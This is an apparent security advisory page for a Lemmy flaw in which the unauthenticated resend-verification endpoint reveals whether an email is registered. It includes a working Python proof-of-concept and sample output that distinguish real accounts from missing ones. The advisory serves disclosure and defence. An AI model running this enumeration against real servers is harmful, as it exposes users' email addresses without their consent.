mediumVulnerability

GHSA-qxrw-f6fh-34r7

## Summary The unauthenticated resend-verification endpoint returns different responses for registered and unregistered email addresses. A malicious third party can submit candidate addresses to `/api/v4/account/auth/resend_verification_email` and distinguish accounts from misses. ## Details `resend_verification_email()` looks up the submitted address and returns the lookup error to the caller: ```rust let local_user_view = LocalUserView::find_by_email(&mut context.pool(), &email).await?; check_local_user_valid(&local_user_view)?; ``` The password reset endpoint already uses a safer pattern. It discards lookup errors and returns success, which prevents the same account-discovery channel. ## Proof of Concept The following script creates one user and probes that address plus a missing address. ```python import requests, random, string BASE = "http://127.0.0.1:8536/api/v4" # change to the target Lemmy URL ADMIN_USER = "lemmy" ADMIN_PASS = "lemmylemmy" PASSWORD = "Password123456!" def post(path, **body): return requests.post(BASE + path, json=body) suffix = "enum" + "".join(random.choice(string.ascii_lowercase) for _ in range(6)) admin = post("/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"] requests.put(BASE + "/site", headers={"Authorization": "Bearer " + admin}, json={"registration_mode": "open", "email_verification_required": False}) email = "alice" + suffix + "@example.test" post("/account/auth/register", username="alice" + suffix, password=PASSWORD, password_verify=PASSWORD, email=email).raise_for_status() for candidate in [email, "missing" + suffix + "@example.test"]: r = post("/account/auth/resend_verification_email", email=candidate) print(candidate, "HTTP", r.status_code, r.text[:300]) ``` Output: ```text [email protected] HTTP 200 {"success":true} [email protected] HTTP 404 {"error":"not_found","cause":"Record not found"} ``` ## Impact A malicious thir

Properties

ghsa_id
GHSA-qxrw-f6fh-34r7
severity
medium
summary
Lemmy resend-verification endpoint exposes registered email addresses to unauthenticated users
cve_id
GHSA-qxrw-f6fh-34r7
is_ghsa_only
true
ghsa_published
2026-05-06T23:49:18Z
source_url
https://github.com/advisories/GHSA-qxrw-f6fh-34r7
ghsa_updated
2026-05-07T13:20:33Z

Related Entities (4)

VULNERABLE_TO (1)

[Software]rust/lemmy_api

AFFECTS (1)

[Software]rust/lemmy_api

HAS_WEAKNESS (1)

[Weakness]Observable Response Discrepancy

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

GHSA-qxrw-f6fh-34r7 — Ninja Signal Threat Intelligence | Ninja Signal